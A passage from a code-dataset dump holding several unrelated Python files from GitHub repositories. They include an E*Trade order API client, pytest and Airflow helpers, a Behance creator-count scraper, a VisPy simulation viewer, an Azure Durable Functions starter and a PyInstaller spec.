'priceType',\n 'quantity',\n 'orderTerm',\n 'marketSession',\n ]\n if not all(param in kwargs for param in mandatory):\n raise ValueError('__check_order: input parameters missing.')\n\n if kwargs['priceType'] == 'STOP' and 'stopPrice' not in kwargs:\n raise ValueError('__check_order: stopPrice missing.')\n if kwargs['priceType'] == 'LIMIT' and 'limitPrice' not in kwargs:\n raise ValueError('__check_order: limitPrice missing.')\n if (kwargs['priceType'] == 'STOP_LIMIT'\n and 'limitPrice' not in kwargs\n and 'stopPrice' not in kwargs):\n raise ValueError('__check_order: stopPrice or limitPrice missing.')\n\n #\n #\n #\n @staticmethod\n def __build_order_payload(order_type: str, **kwargs) -> dict:\n instrument = {\n 'Product': {'securityType': 'EQ',\n 'symbol': kwargs['symbol']},\n 'orderAction': kwargs['orderAction'],\n 'quantityType': 'QUANTITY',\n 'quantity': int(kwargs['quantity']), # TODO Force convertion to integer.\n }\n order = kwargs\n order['Instrument'] = instrument\n payload = {\n order_type: {\n 'orderType': 'EQ',\n 'clientOrderId': kwargs['clientOrderId'],\n 'Order': order,\n }\n }\n if 'previewId' in kwargs:\n payload[order_type]['PreviewIds'] = {'previewId': kwargs['previewId']}\n return payload\n\n #\n #\n #\n @staticmethod\n def __retrieve_response(resp: requests.models.Response) -> dict:\n resp.raise_for_status()\n resp = xmltodict.parse(resp.text)\n # TODO Not fully tested.\n if len(resp.keys()) == 1:\n body = resp[next(iter(resp))]\n if len(body.keys()) == 1:\n if 'Messages' in body:\n raise ValueError(body['Messages']['Message']['description'])\n if 'Error' in resp:\n raise ValueError(resp['Error']['message'])\n return resp\n\n #\n #\n #\n def __perform_request(self, request_type: str, api_url: str, payload: dict) -> dict:\n headers = {'Content-Type': 'application/xml'}\n payload = xmltodict.unparse(payload, encoding='utf-8')\n resp = None\n if request_type == 'post':\n resp = self.__session.post(api_url, data=payload, headers=headers)\n if request_type == 'put':\n resp = self.__session.put(api_url, data=payload, headers=headers)\n if resp is not None:\n resp.raise_for_status()\n resp = xmltodict.parse(resp.text)\n if 'Error' in resp:\n raise ValueError(resp['Error']['message'])\n else:\n raise ValueError('__perform_request: invalid value in request_type.')\n return resp\n\n #\n #\n #\n def __generate_order_preview(self, **kwargs) -> int:\n self.__check_order(**kwargs)\n api_url = self.__get_url('accounts/' + kwargs['accountId'] + '/orders/preview')\n payload = self.__build_order_payload(order_type='PreviewOrderRequest', **kwargs)\n\n resp = self.__perform_request(request_type='post', api_url=api_url, payload=payload)\n return int(resp['PreviewOrderResponse']['PreviewIds']['previewId'])\n\n #\n #\n #\n def __generate_change_order_preview(self, **kwargs) -> int:\n self.__check_order(**kwargs)\n api_url = self.__get_url('accounts/' + kwargs['accountId'] + '/orders/' + str(kwargs['orderId']) + '/change/preview')\n payload = self.__build_order_payload(order_type='PreviewOrderRequest', **kwargs)\n\n resp = self.__perform_request(request_type='put', api_url=api_url, payload=payload)\n return int(resp['PreviewOrderResponse']['PreviewIds']['previewId'])\n\n #\n #\n #\n def place_equity_order(self, **kwargs) -> int:\n \"\"\"Places an equity order.\n\n Args:\n accountId: str\n symbol: str\n orderAction: BUY or SELL.\n clientOrderId: str\n priceType: MARKET, LIMIT, or STOP.\n limitPrice: float\n stopPrice: float\n quantity: int\n marketSession: REGULAR or EXTENDED.\n orderTerm: GOOD_UNTIL_CANCEL\n prev_order_id: int\n\n Returns:\n Order number.\n \"\"\"\n self.__check_order(**kwargs)\n\n if 'prev_order_id' in kwargs:\n prev_order_id = kwargs.pop('prev_order_id')\n if prev_order_id is not None:\n kwargs['orderId'] = prev_order_id\n return self.__change_equity_order(**kwargs)\n\n if 'previewId' not in kwargs:\n kwargs['previewId'] = self.__generate_order_preview(**kwargs)\n\n api_url = self.__get_url('accounts/' + kwargs['accountId'] + '/orders/place')\n payload = self.__build_order_payload(order_type='PlaceOrderRequest', **kwargs)\n\n resp = self.__perform_request(request_type='post', api_url=api_url, payload=payload)\n return int(resp['PlaceOrderResponse']['OrderIds']['orderId'])\n\n #\n #\n #\n def __change_equity_order(self, **kwargs) -> int:\n self.__check_order(**kwargs)\n\n if 'previewId' not in kwargs:\n kwargs['previewId'] = self.__generate_change_order_preview(**kwargs)\n\n api_url = self.__get_url('accounts/' + kwargs['accountId'] + '/orders/' + str(kwargs['orderId']) + '/change/place')\n payload = self.__build_order_payload(order_type='PlaceOrderRequest', **kwargs)\n\n resp = self.__perform_request(request_type='put', api_url=api_url, payload=payload)\n return int(resp['PlaceOrderResponse']['OrderIds']['orderId'])\n\n #\n #\n #\n def cancel_order(self, account_id: str, order_id: int) -> str:\n \"\"\"Cancels an order.\n\n Args:\n account_id: Id of the account where the request has to be performed.\n order_id: Id of the order to cancel.\n\n Returns:\n Confirmation message.\n \"\"\"\n api_url = self.__get_url('accounts/' + account_id + '/orders/cancel')\n payload = {'CancelOrderRequest': {'orderId': order_id}}\n\n resp = self.__perform_request(request_type='put', api_url=api_url, payload=payload)\n return resp['CancelOrderResponse']['Messages']['Message']['description']\n","repo_name":"LucaBallan/PythonTradingPlatform","sub_path":"trade_interface/e_trade_api.py","file_name":"e_trade_api.py","file_ext":"py","file_size_in_byte":16304,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"3"} +{"seq_id":"29043365747","text":"# -*- coding: utf-8 -*-\nimport sys\nimport importlib\nimport itertools\nimport pytest\nfrom collections import namedtuple\nfrom balancer.test.util import multiscope\nimport balancer.test.util.context as mod_ctx\n\nfrom balancer.test.util import asserts # noqa: F401\nfrom balancer.test.util.predef import http # noqa: F401\nfrom balancer.test.util import dnsfake # noqa: F401\nfrom balancer.test.util.predef.http.response import custom # noqa: F401\nfrom balancer.test.util.predef.handler.server.http import SimpleConfig, DummyConfig # noqa: F401\n\n\ndef __known_plugin(name):\n try:\n return importlib.import_module(name)\n except ImportError:\n return None\n\n\ndef __filter_plugins(all_plugins):\n return [p for p in map(__known_plugin, all_plugins) if p]\n\n\n__KNOWN_PLUGINS = __filter_plugins([\n 'balancer.test.plugin.awacs',\n 'balancer.test.plugin.awacs_config',\n 'balancer.test.plugin.backend',\n 'balancer.test.plugin.balancer',\n 'balancer.test.plugin.cachedaemon',\n 'balancer.test.plugin.certs',\n 'balancer.test.plugin.connection',\n 'balancer.test.plugin.dnsfake',\n 'balancer.test.plugin.fs',\n 'balancer.test.plugin.logger',\n 'balancer.test.plugin.options',\n 'balancer.test.plugin.port',\n 'balancer.test.plugin.process',\n 'balancer.test.plugin.resource',\n 'balancer.test.plugin.server',\n 'balancer.test.plugin.static',\n 'balancer.test.plugin.stream',\n 'balancer.test.plugin.sync',\n 'balancer.test.plugin.tcpdump',\n])\n\n\n__MANAGERS_ATTR = 'MANAGERS'\n__CONTEXTS_ATTR = 'CONTEXTS'\n\n\ndef __get_attrs(attr_name):\n return list(itertools.chain(*[\n getattr(plugin, attr_name) for plugin in __KNOWN_PLUGINS if hasattr(plugin, attr_name)\n ]))\n\n\n__ALL_MANAGERS = __get_attrs(__MANAGERS_ATTR)\n__ALL_CONTEXTS = __get_attrs(__CONTEXTS_ATTR)\n\n\nManager = namedtuple('Manager', [m.manager_name for m in __ALL_MANAGERS])\n\n\n__MANAGER_FIXTURE_TEMPLATE = '''\\\ndef manager({args}):\n return Manager({args_map})\n'''\n\n\ndef __gen_manager_fixture():\n namespace = dict(\n Manager=Manager,\n )\n args_str = ', '.join([m.fixture_name for m in __ALL_MANAGERS])\n args_map_str = ', '.join(['{}={}'.format(m.manager_name, m.fixture_name) for m in __ALL_MANAGERS])\n code_str = __MANAGER_FIXTURE_TEMPLATE.format(args=args_str, args_map=args_map_str)\n exec(code_str, namespace)\n return namespace['manager']\n\n\nmanager = multiscope.fixture(pytest_fixtures=[\n m.fixture_name for m in __ALL_MANAGERS if m.fixture_type == multiscope.FixtureType.PYTEST\n], parent=sys.modules[__name__])(__gen_manager_fixture())\n\n\n@multiscope.fixture(pytest_fixtures=['request', 'session_state', 'module_state', 'class_state'])\nclass StateFixture(object):\n __fixturename__ = 'state'\n\n @staticmethod\n def session_state():\n return mod_ctx.State()\n\n @staticmethod\n def module_state(session_state):\n return mod_ctx.State(session_state)\n\n @staticmethod\n def class_state(module_state, request):\n if request.cls is not None:\n return mod_ctx.State(module_state)\n else:\n return None\n\n @staticmethod\n def function_state(module_state, class_state):\n parent_state = class_state if class_state is not None else module_state\n return mod_ctx.State(parent_state)\n\n\ndef __ctx_init(self, request, manager, state):\n self.__request = request\n self.__manager = manager\n self.__state = state\n super(Context, self).__init__()\n\n\n@property\ndef __ctx_request(self):\n return self.__request\n\n\n@property\ndef __ctx_manager(self):\n return self.__manager\n\n\n@property\ndef __ctx_state(self):\n return self.__state\n\n\nContext = type('Context', tuple(__ALL_CONTEXTS), dict(\n __init__=__ctx_init,\n request=__ctx_request,\n manager=__ctx_manager,\n state=__ctx_state,\n))\n\n\n@multiscope.fixture(pytest_fixtures=['request'])\ndef ctx(request, manager, state):\n return Context(request, manager, state)\n\n\ndef create_fixture(mixin_cls, params=None, ids=None):\n class LocalContext(Context, mixin_cls):\n pass\n\n @pytest.fixture(params=params, ids=ids)\n def fixture_func(request, manager, state):\n return LocalContext(request, manager, state)\n\n return fixture_func\n\n\npytest_plugins = [p.__name__ for p in __KNOWN_PLUGINS]\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"balancer/test/plugin/context/_context.py","file_name":"_context.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21270107713","text":"from airflow import DAG\nfrom operators import LoadDimensionOperator\nfrom helpers import SqlQueries\n\ndef get_load_dim_subdag (\n parent_dag_name, \n task_id,\n redshift_conn_id,\n default_args,\n *args, **kwargs):\n\n dag = DAG(\n dag_id=f\"{parent_dag_name}.{task_id}\",\n default_args=default_args,\n catchup=False,\n schedule_interval='0 * * * *'\n )\n\n load_user_dimension_table = LoadDimensionOperator(\n task_id='Load_user_dim_table',\n dag=dag,\n redshift_conn_id=redshift_conn_id,\n table=\"users\",\n et_query=SqlQueries.user_table_insert\n )\n\n load_song_dimension_table = LoadDimensionOperator(\n task_id='Load_song_dim_table',\n dag=dag,\n redshift_conn_id=redshift_conn_id,\n table=\"songs\",\n et_query=SqlQueries.song_table_insert\n )\n\n load_artist_dimension_table = LoadDimensionOperator(\n task_id='Load_artist_dim_table',\n dag=dag,\n redshift_conn_id=redshift_conn_id,\n table=\"artists\",\n et_query=SqlQueries.artist_table_insert\n )\n\n load_time_dimension_table = LoadDimensionOperator(\n task_id='Load_time_dim_table',\n dag=dag,\n redshift_conn_id=redshift_conn_id,\n table=\"time\",\n et_query=SqlQueries.time_table_insert\n )\n\n load_user_dimension_table\n load_song_dimension_table\n load_artist_dimension_table\n load_time_dimension_table\n\n return dag\n\n\n","repo_name":"mathias-mike/Project-Sparkify","sub_path":"Pipeline/dags/load_dim_subdag.py","file_name":"load_dim_subdag.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15780414894","text":"import json\nimport re\n\nimport requests\n\nfrom 图片采集4_0.config import country_data_dict_list\n\nheaders = {\n \"authority\": \"www.behance.net\",\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\",\n \"accept-language\": \"zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\",\n \"cache-control\": \"max-age=0\",\n \"sec-ch-ua\": \"\\\"Chromium\\\";v=\\\"112\\\", \\\"Microsoft Edge\\\";v=\\\"112\\\", \\\"Not:A-Brand\\\";v=\\\"99\\\"\",\n \"sec-ch-ua-mobile\": \"?0\",\n \"sec-ch-ua-platform\": \"\\\"Windows\\\"\",\n \"sec-fetch-dest\": \"document\",\n \"sec-fetch-mode\": \"navigate\",\n \"sec-fetch-site\": \"none\",\n \"sec-fetch-user\": \"?1\",\n \"upgrade-insecure-requests\": \"1\",\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68\"\n}\ncookies = {\n \"OptanonAlertBoxClosed\": \"2024-04-19T02:53:52.257Z\",\n \"OptanonConsent\": \"groups=C0001%3A1%2CC0002%3A1%2CC0003%3A1%2CC0004%3A1\",\n \"dialog_dismissals\": \"announcement_36%3Blogin_prompt\",\n \"sign_up_prompt\": \"true\",\n \"gki\": \"{%22feature_adobe_checkout_modal_primary_nav%22:false%2C%22feature_creative_cloud_search%22:false%2C%22feature_gql_profile_drafts_request%22:false%2C%22feature_inbox_file_uploads%22:false}\",\n \"AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg\": \"870038026%7CMCMID%7C19164445593973786131767815682217063165%7CMCAID%7CNONE%7CMCOPTOUT-1683277804s%7CNONE%7CvVersion%7C5.0.0\",\n \"gk_suid\": \"29516305\",\n \"originalReferrer\": \"\",\n \"ilo0\": \"true\",\n \"bcp\": \"05807658-7637-4841-a422-b6b66de68002\"\n}\nurl = \"https://www.behance.net/hire\"\n\nDataList = country_data_dict_list()\n\ndata = []\ndata_file = []\n\nwith open('./创作者总共数量.json', 'r') as f:\n fails = json.load(f)\n\n\ndef obtainTheNumberOfPeople():\n for country in DataList[13:]:\n print(f\"当前是:{DataList.index(country) + 1} 个,共计:{len(DataList)}\")\n print(country)\n params = {\n \"country\": f\"{country['value']}\"\n }\n response = requests.get(url, headers=headers, cookies=cookies, params=params)\n if response.status_code == 200:\n Html = response.text\n\n match = re.search(r'\"totalSearchCount\":(\\d+),', Html)\n if match:\n total_search_count = match.group(1)\n # print(total_search_count)\n data.append({f\"{country['label']}\": total_search_count})\n # print(data)\n fails.append({f\"{country['label']}\": total_search_count})\n with open('./创作者总共数量.json', 'w') as f:\n json.dump(fails, f)\n print(f\"{country['value']} 成功获取\")\n # time.sleep(random.randint(1, 3))\n else:\n print(f\"{country['label']} 状态码不正确\")\n data_file.append(country)\n\n\ndef calculateTheNumberOfPeople():\n total = 0\n for i in fails:\n total = total + int(i[DataList[fails.index(i)]['label']])\n print(total)\n\n\nif __name__ == '__main__':\n \"\"\"\n 获取网站上国家的人数,写入json文件\n \"\"\"\n # obtainTheNumberOfPeople()\n \"\"\"\n 打印所有的国家的创作者的人数\n \"\"\"\n calculateTheNumberOfPeople()\n","repo_name":"Cykypa/Cykypa_SWT","sub_path":"图片采集4_0/创作者总数测试.py","file_name":"创作者总数测试.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"763083632","text":"from sqlalchemy import Column\nfrom db.cm_session import cm_session, Base\nfrom sqlalchemy.dialects.mssql import BIT, CHAR, DATETIME, NVARCHAR\n\n\nclass TbRedAlert(Base):\n __tablename__ = 'tb_RedAlert'\n RA_ID = Column(CHAR(36), primary_key=True, nullable=False)\n RA_Temporary = Column(BIT)\n RA_IssuedTime = Column(DATETIME)\n RA_CreatorName = Column(NVARCHAR(256))\n RA_TamID = Column(CHAR(36))\n RA_Closed = Column(BIT)\n RA_ClosedTime = Column(DATETIME)\n RA_ScheduleDownloadID = Column(CHAR(36))\n RA_IsAutoStop = Column(BIT)\n RA_PlannedStopTime = Column(DATETIME)\n","repo_name":"hsiang0107/Restful_API_Testing","sub_path":"db/models/tb_RedAlert.py","file_name":"tb_RedAlert.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24447503360","text":"from os import environ\nimport aiohttp\nimport json\nimport nats\nfrom logging import getLogger, basicConfig, DEBUG\nfrom bs4 import BeautifulSoup\n\nbasicConfig(level=DEBUG)\nlogger = getLogger(__name__)\nlogger.info(\"starting\")\n\n\nasync def get_nats_connection():\n NATS_HOST = environ.get(\"NATS_SERVER\", \"nats://demo.nats.io:4222\")\n return await nats.connect(NATS_HOST)\n\n\nasync def http_get(url: str):\n try:\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n ret = await response.text()\n logger.info(f\"url {url} returned {ret[0:15]}...\")\n return ret\n except Exception as e:\n logger.exception(e)\n\n\ndef parse_title(html):\n soup = BeautifulSoup(html, \"html.parser\")\n title = soup.find(\"title\")\n return title.text\n\n\nasync def get_title_from_nats(nc, url):\n payload = json.dumps({\"method\": \"GET\", \"url\": url})\n resp = await nc.request(\"url_getter\", payload.encode(), timeout=15)\n return parse_title(resp.data)\n","repo_name":"abloch/nats-url-getter","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42841820270","text":"import barneshut_cpp.cppsim as cs\nfrom helper_files.sim_utils import get_positions\nfrom helper_files.mass_to_color import bodies_to_color\nimport argparse\nimport numpy as np\nfrom vispy import app, gloo, scene\nfrom vispy.visuals import Visual\nfrom vispy.plot import Fig\nfrom vispy.scene.cameras import ArcballCamera, FlyCamera\nfrom vispy import io\nimport imageio\nfrom tqdm import tqdm\n\napp.use_app('PyQt5')\n\n\"\"\"\nThis module visualizes a BINV-file using VisPy and OpenGL. \nIt supports recording, speed adjustment, camera adjustment and standard sizes.\nUse the `-r ` option to record to a file. This file can have any format.\nKeybinding:\n* `]` Double speed of replay\n* `[` Half speed of replay\n* `r` Start recording, only if `-r` passed\n* `s` Stop recording, quits the visualization\n* `m` Make shot (one full play)\n* `Esc` Quit the visualization\n* `f` Set full HD size, 1920x1080\n* `h` Set HD size, 1280x720 \n* F11 Set fullscreen\n* `=` Increase pointsize by 1\n* `-` Decrease pointsize by 1\n* `spacebar` Pause and continue\n* `z` zoom in\n* `x` zoom out\n\"\"\"\n\n\n\nvertex_shader = \"\"\"\nvarying vec3 v_color;\nvoid main() {\n gl_Position = $transform(vec4($position, 1));\n gl_PointSize = $pointsize;\n v_color = $color;\n}\n\"\"\"\n\nfragment_shader = \"\"\"\nuniform sampler2D u_texture;\nvarying vec3 v_color;\nvoid main() {\n float star_tex_intensity = texture2D(u_texture, gl_PointCoord).r;\n gl_FragColor = vec4(star_tex_intensity * v_color, 0.8);\n}\n\"\"\"\n\n\ndef load_star_image():\n #fname = io.load_data_file('galaxy/star-particle.png')\n raw_image = io.read_png('helper_files/star-particle.png')\n return raw_image\n\n\ndef load_data(filename, mass_scale, show_dm, no_show_m, darkmatter_intensity):\n print(\"Start loading data...\")\n preloaded = cs.Result.load(filename).numpy()\n print(\"Selecting data...\")\n func = np.vectorize(lambda b: (show_dm and b.dark_matter) or (not no_show_m and not b.dark_matter))\n preloaded = preloaded[:,func(preloaded[0])]\n print(preloaded.shape)\n print(\"Extracting positions and adding color...\")\n positions = get_positions(preloaded).astype(np.float32)\n c = bodies_to_color(preloaded[0], mass_scale)\n if show_dm:\n dm_index = [i for i, b in enumerate(preloaded[0]) if b.dark_matter]\n c[dm_index] = [0, darkmatter_intensity, 0]\n colors = gloo.VertexBuffer(c)\n print(\"Data loaded and ready for GPU\")\n return positions, colors\n\nclass GalaxyVisual(Visual):\n def __init__(self, positions, colors):\n Visual.__init__(self, vertex_shader, fragment_shader)\n self.positions = positions\n self.colors = colors\n self.frames = self.positions.shape[0]\n self._vertices = gloo.VertexBuffer()\n self.set_vertex_data(0)\n self._draw_mode = 'points'\n self.texture = gloo.Texture2D(load_star_image(), interpolation='linear')\n self.shared_program['u_texture'] = self.texture\n self.shared_program.vert['color'] = self.colors\n self.pointsize = 5\n self.set_gl_state(clear_color=(0.0, 0.0, 0.03, 1.0), \n depth_test=False, blend=True,\n blend_func=('src_alpha', 'one'))\n def set_vertex_data(self, i):\n self._vertices.set_data(self.positions[i])\n self.update()\n\n def _prepare_transforms(self, view):\n view.view_program.vert['transform'] = view.get_transform()\n\n def _prepare_draw(self, view):\n self.shared_program.vert['position'] = self._vertices\n self.shared_program.vert['pointsize'] = self.pointsize\n\n\n\n# Argument parsing\nparser = argparse.ArgumentParser(description=\"Visualize simulation\")\nparser.add_argument('file', help=\"binv file to play\")\nparser.add_argument('-r', '--record', default='-', type=str, help=\"Record to file\")\nparser.add_argument('-m', '--massscale', default=1, type=float, help=\"Mass scale\")\nparser.add_argument('-d', '--darkmatter', action='store_true', help=\"Whether to show darkmatter\")\nparser.add_argument('-i', '--darkmatter_intensity', default=0.5, type=float, help=\"Darkmatter intensity 0.0 to 1.0\")\nparser.add_argument('-o', '--no_ordinary_matter', action='store_true', help='Whether to remove ordinary matter')\nargs = parser.parse_args()\n\n\n# Data loading\npos, col = load_data(args.file, args.massscale, args.darkmatter, args.no_ordinary_matter, args.darkmatter_intensity)\n\nprint(\"Starting GUI\")\nGalaxy = scene.visuals.create_visual_node(GalaxyVisual)\ncanvas = scene.SceneCanvas(size=(800, 800), keys='interactive', show=True)\nview = canvas.central_widget.add_view()\nview.camera = ArcballCamera(fov=45, distance=5e20)\n\n# Create Globals\nprint(\"Start the galaxy visual\")\nvis = Galaxy(pos, col, parent=view.scene)\nprint(\"Created visual\")\ntimescale = 1\nrecord = False\ncan_record = args.record != '-'\nfilename = args.record\nframes = []\nfps = 1\npaused = False\nlag = 0\nstart_shot= False\nstarted_shot = False\nfinished_shot = False\n\n# fps setter\ndef set_fps(result):\n global fps\n fps = result\n\n\n# Handle update\ndef update_vertices(ev, *args):\n global vis, timescale, canvas, frames, lag, paused, record, start_shot, started_shot, finished_shot\n if not paused:\n index = int((ev.count-lag) / timescale) % vis.frames\n vis.set_vertex_data(index)\n if start_shot and index == 0:\n if started_shot:\n finished_shot = True\n print(\"Start round\")\n record = True\n started_shot = True\n\n else:\n lag += 1\n if record:\n im = canvas.render()\n frames.append(im)\n if finished_shot:\n print(\"Start saving\")\n record = False\n can_record = False\n app.quit()\n canvas.close()\n print(\"Saving...\")\n write_recording()\n\ntimer = app.Timer()\ntimer.connect(update_vertices)\ntimer.start(0)\n\ndef write_recording():\n global frames, filename, fps\n writer = imageio.get_writer(filename, fps=fps, codec='libx264', quality=10, pixelformat='yuv420p')\n for i in tqdm(frames):\n writer.append_data(i)\n writer.close()\n print(\"Saved to file\", filename)\n\n\n# Handle speedupapp.use_app('Pyglet')\n@canvas.events.key_press.connect\ndef handle_key(ev):\n global timescale, record, can_record, frames, filename, canvas, paused, start_shot, view\n if ev.text == ']':\n # Increase speed\n timescale /= 2\n print(\"Timescale is now\", timescale)\n elif ev.text == '[':\n # Decrease speed\n timescale *= 2\n print(\"Timescale is now\", timescale)\n elif ev.text == 'r':\n # Start record\n if record:\n print(\"Already recording\")\n elif can_record:\n record = True\n print(\"Started recording\")\n # Measure fps\n canvas.measure_fps(callback=set_fps)\n else:\n print(\"Record is disabled\")\n elif ev.text == 's':\n if can_record and record:\n record = False\n can_record = False\n app.quit()\n canvas.close()\n print(\"Saving...\")\n write_recording()\n elif ev.text == 'f':\n canvas.size = (1920, 1080)\n elif ev.text == 'h':\n canvas.size = (1280, 720)\n elif ev.text == '=':\n vis.pointsize += 1\n print(f\"Pointsize is {vis.pointsize}\")\n elif ev.text == '-':\n vis.pointsize -= 1\n print(f\"Pointsize is {vis.pointsize}\")\n elif ev.text == ' ':\n if paused:\n print(\"Unpaused\")\n else:\n print(\"Paused\")\n paused = not paused\n elif ev.text == 'm':\n start_shot = True\n elif ev.text == 'z':\n view.camera.distance *= 0.9\n elif ev.text == 'x':\n view.camera.distance *= 1.1\napp.run()","repo_name":"lucashc/StellarSim","sub_path":"helper_files/vispy.py","file_name":"vispy.py","file_ext":"py","file_size_in_byte":7708,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"70903661202","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport socket\n#SERVIDOR\nhost = '127.0.0.1'\nporta = 50000\ncaminho = (host, porta)\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind(caminho)\ns.listen()\n\ncon, caminho_cliente = s.accept()\n\nprint(caminho_cliente)\n\nwhile True:\n dados = con.recv(1024)\n con.sendall(dados)\n if not dados:\n break\n print('Mensagem recebida: ', dados.decode())\n\ns.close()\n","repo_name":"GabrielMendesdc/Socket","sub_path":"servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"34854034740","text":"import logging\nimport json\nimport azure.functions as func\nimport azure.durable_functions as df\n\nfrom .. import DocumentGrapher\n\nasync def main(req: func.HttpRequest, starter: str) -> func.HttpResponse:\n client = df.DurableOrchestrationClient(starter)\n\n try:\n body = json.dumps(req.get_json())\n except ValueError:\n return func.HttpResponse(\n \"Invalid body\",\n status_code=400\n )\n \n # If there is nowhere to put the translated documents just skip.\n if body:\n values = json.loads(body)['values']\n \n # Prepare the Output before the loop\n results = {}\n results[\"values\"] = []\n\n for value in values:\n output_record=create_empty_record(value)\n\n instance_id = await client.start_new(\"DocumentGrapherOrchestrator\", None, value)\n logging.info(f\"Started orchestration with ID = '{instance_id}'.\")\n output_record['data']['message']=instance_id\n\n if output_record != None:\n results[\"values\"].append(output_record)\n\n return func.HttpResponse(json.dumps(results, ensure_ascii=False), mimetype=\"application/json\")\n else:\n return func.HttpResponse(\n \"Invalid body\",\n status_code=400\n )\n\ndef create_empty_record(value):\n document = {}\n document['recordId'] = value['recordId']\n document['data'] = {}\n document['warnings'] = []\n document['errors'] = []\n\n return document\n","repo_name":"microsoft/dstoolkit-km-solution-accelerator","sub_path":"src/CognitiveSearch.Skills/Python/Graph/shared_code/DocumentGrapher/Durable/HttpStart_init.py","file_name":"HttpStart_init.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"3"} +{"seq_id":"72498008080","text":"# -*- mode: python ; coding: utf-8 -*-\nimport sys\nprint(\"python ver:\", sys.version[:3])\nif sys.version[:3] < \"3.7\":\n sys.exit()\nelse:\n print(\"python version okay\")\n\nimport vispy.glsl\nimport vispy.io\nimport distributed\nimport dask\n# import m2cgen\nimport napari\nimport gdown\nfrom PyInstaller.utils.hooks import get_module_file_attribute\n\nfrom distutils.sysconfig import get_python_lib\n\nfrom os import path\nskimage_plugins = Tree(\n path.join(get_python_lib(), \"skimage\",\"io\",\"_plugins\"),\n prefix=path.join(\"skimage\",\"io\",\"plugins\"),\n)\n\nblock_cipher = None\n\n# (os.path.join(os.path.dirname(get_module_file_attribute('sklearn.cluster')), \"_k_means_common.cpython-39-darwin.so\"), \"sklearn.cluster._k_means_common\")\n\na = Analysis(['../../aydin/cli/cli.py'],\n pathex=['/Users/ahmetcan.solak/Dev/AhmetCanSolak/aydin/aydin/cli'],\n binaries=[],\n datas=[(os.path.join(os.path.dirname(napari.__file__)), 'napari'),\n (os.path.join(os.path.dirname(dask.__file__)), 'dask'),\n (os.path.join(os.path.dirname(distributed.__file__)), 'distributed'),\n (os.path.dirname(vispy.glsl.__file__), os.path.join(\"vispy\", \"glsl\")),\n (os.path.join(os.path.dirname(vispy.io.__file__), \"_data\"), os.path.join(\"vispy\", \"io\", \"_data\"))],\n hiddenimports=[\n \"aydin.it.transforms.attenuation\",\n \"aydin.it.transforms.deskew\",\n \"aydin.it.transforms.fixedpattern\",\n \"aydin.it.transforms.highpass\",\n \"aydin.it.transforms.histogram\",\n \"aydin.it.transforms.motion\",\n \"aydin.it.transforms.padding\",\n \"aydin.it.transforms.periodic\",\n \"aydin.it.transforms.range\",\n \"aydin.it.transforms.salt_pepper\",\n \"aydin.it.transforms.variance_stabilisation\",\n \"numba.core.typing.cffi_utils\",\n \"aydin.it.regression.cb\",\n \"aydin.it.regression.lgbm\",\n \"aydin.it.regression.linear\",\n \"aydin.it.regression.nn\",\n \"aydin.it.regression.random_forest\",\n \"aydin.it.regression.support_vector\",\n \"sklearn.neighbors._partition_nodes\",\n \"sklearn.cluster.*\",\n \"pydantic\",\n \"magicgui\",\n \"napari_plugin_engine\",\n \"qtpy\",\n \"imageio.plugins.tifffile\",\n \"imageio.plugins.pillow_legacy\",\n \"imageio.plugins.ffmpeg\",\n \"imageio.plugins.bsdf\",\n \"imageio.plugins.dicom\",\n \"imageio.plugins.feisem\",\n \"imageio.plugins.fits\",\n \"imageio.plugins.gdal\",\n \"imageio.plugins.simpleitk\",\n \"imageio.plugins.npz\",\n \"imageio.plugins.spe\",\n \"imageio.plugins.swf\",\n \"imageio.plugins.grab\",\n \"imageio.plugins.lytro\",\n \"imageio.plugins.freeimage\",\n \"imageio.plugins.freeimagemulti\",\n \"napari._qt\",\n \"psygnal._signal\",\n \"sklearn.utils._typedefs\",\n \"sklearn.utils._heap\",\n \"sklearn.utils._sorting\",\n \"sklearn.utils._vector_sentinel\",\n \"gdown.download\", \"napari\", \"tensorflow_core._api.v2.compat\",\"vispy.app.backends._pyqt5\",\"vispy.glsl\",\n \"sklearn.utils._cython_blas\"],\n hookspath=[\"hooks\"],\n runtime_hooks=[\n \"runtimehooks/hook-bundle.py\",\n \"runtimehooks/hook-multiprocessing.py\",\n \"runtimehooks/hook-splash.py\"\n ],\n excludes=[])\n\npyz = PYZ(a.pure)\n\n# filter binaries.. exclude some dylibs that pyinstaller packaged but\n# we actually dont need (e.g. wxPython)\n\nimport re\nreg = re.compile(\".*(PyQt4|k_means|mpl-data|zmq|QtWebKit|QtQuick|wxPython).*\")\n\n# from pprint import pprint\n# pprint(a.binaries)\n\na.binaries = [s for s in a.binaries if reg.match(s[1]) is None]\n\na.datas += [(\"biohub_logo.png\", 